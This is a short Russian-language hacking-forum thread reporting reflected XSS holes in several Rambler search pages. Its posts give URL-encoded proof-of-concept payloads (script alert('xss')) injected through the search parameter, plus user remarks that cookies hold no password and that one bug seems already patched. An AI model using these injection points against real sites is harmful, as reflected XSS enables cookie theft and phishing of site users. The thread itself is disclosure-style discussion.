Форум АНТИЧАТ - XSS на Rambler

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - XSS на Rambler (https://forum.antichat.xyz/showthread.php?t=25076)

XSS на Rambler

Вот нашел на Рамблере

Код:

http://planeta.rambler.ru/srch?words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&set=&sort=6&cc=%CA%EE%ED%F2%F0%EE%EB%FC&old_q=

В поиск по планетам вводим
"><script>alert("xss")</script>

А в теме Xss трудно было запостить !? Надо было обязательно создавать отдельную тему !? Мда ...

Котег сори за отдельную тему))

Вот тоже с Рамблера
поисковый запрос

Код:

http://f1.rambler.ru/srch/?sort=1&control_charset=%EB%CF%CE%D4%D2%CF%CC%D8&words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E

Атак же при двойном запросе в
http://finance.rambler.ru/db/instrsearch.html

При запросе поиска фото

Код:

http://foto.rambler.ru/srch?control_charset=%CA%EE%ED%F2%F0%EE%EB%FC&sort=0&set=photo&words=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E

Это все хорошо, но помойму от них пользы мало. В куках то пароля нету...

ЗЫ Кажется первую багу уже залатали =-О

Добавил
Упс, уже сам догадался для чего такую багу заюзать =)